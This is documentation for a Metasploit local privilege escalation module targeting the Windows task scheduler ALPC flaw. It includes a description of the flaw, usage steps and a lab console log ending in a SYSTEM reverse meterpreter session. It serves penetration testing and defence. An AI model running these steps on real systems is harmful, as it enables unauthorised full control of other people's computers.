adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
42ccc37bcad1c19fa2019e2bf00366db423bbb5e
metasploit-gs/documentation/modules/exploit/windows/local/alpc_taskscheduler.md
T
Jacob Robles 42ccc37bca Added description to module
2018-09-19 10:22:51 -05:00

2.5 KiB
Raw Blame History

Description

On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented by the task scheduler service can be used to write arbitrary DACLs to .job files located in c:\windows\tasks because the scheduler does not use impersonation when checking this location. Since users can create files in the c:\windows\tasks folder, a hardlink can be created to a file the user has read access to. After creating a hardlink, the vulnerability can be triggered to set the DACL on the linked file. This module has been tested against Windows 10 Pro x64.

Vulnerable Application

Windows OSes without KB4457142 patch

Verification Steps

  • Get a meterpreter session on Windows 10 x64
  • use exploit/windows/local/alpc_taskscheduler
  • set session <session>
  • set payload <payload>
  • set lhost <lhost>
  • run
  • Get a session as SYSTEM

Scenarios

Tested on Windows 10 Pro Version 1803 x64

msf5 exploit(windows/local/alpc_taskscheduler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  1         meterpreter x64/windows  DESKTOP-IPOGIJR\msfdev @ DESKTOP-IPOGIJR  172.22.222.243:4444 -> 172.22.222.200:50490 (172.22.222.200)

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 172.22.222.243:4444 
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
[*] Payload (5120 bytes) uploaded on DESKTOP-IPOGIJR to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 3768 launched.
[*] Attempting to change the payload path to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll...
[*] Reflectively injecting the exploit DLL into 3768...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.243:4444 -> 172.22.222.200:50491) at 2018-09-17 17:37:07 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
Reference in New Issue View Git Blame Copy Permalink